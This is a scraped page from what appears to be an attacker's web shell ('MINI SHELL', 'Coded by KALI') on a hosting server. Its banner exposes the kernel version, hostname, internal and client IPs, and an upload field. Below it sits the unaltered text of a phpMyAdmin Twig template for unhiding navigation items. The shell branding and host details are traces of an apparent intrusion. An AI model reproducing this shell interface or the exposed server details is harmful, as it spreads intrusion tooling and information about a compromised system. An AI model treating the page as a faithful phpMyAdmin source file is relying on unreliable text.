~ K    A     L    I ~
UNAME : Linux web65.extendcp.co.uk 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
SERVER IP : 10.0.187.65 -________- CLIENT IP : 216.73.216.230
PATH :/home/phpmyadmin-www/templates/navigation/
UP FILE :
MINI SHELL D ZAB '
Current File : //home/phpmyadmin-www/templates/navigation/item_unhide_dialog.twig
<form class="ajax" action="{{ url('/navigation') }}" method="post">
  <fieldset class="pma-fieldset">
    {{ get_hidden_inputs(database, table) }}

    {% for type, label in types %}
      {% if (item_type is empty or item_type == type) and hidden[type] is iterable %}
        {{ not loop.first ? '<br>' }}
        <strong>{{ label }}</strong>
        <table class="table w-100">
          <tbody>
            {% for item in hidden[type] %}
              <tr>
                <td>{{ item }}</td>
                <td class="text-end">
                  <a class="unhideNavItem ajax" href="{{ url('/navigation') }}" data-post="{{ get_common({
                    'unhideNavItem': true,
                    'itemType': type,
                    'itemName': item,
                    'dbName': database
                  }, '', false) }}">{{ get_icon('show', 'Unhide'|trans) }}</a>
                </td>
              </tr>
            {% endfor %}
          </tbody>
        </table>
      {% endif %}
    {% endfor %}
  </fieldset>
</form>
Coded by KALI :v Greetz to DR HARD ../ kali.zbi@hotmail.com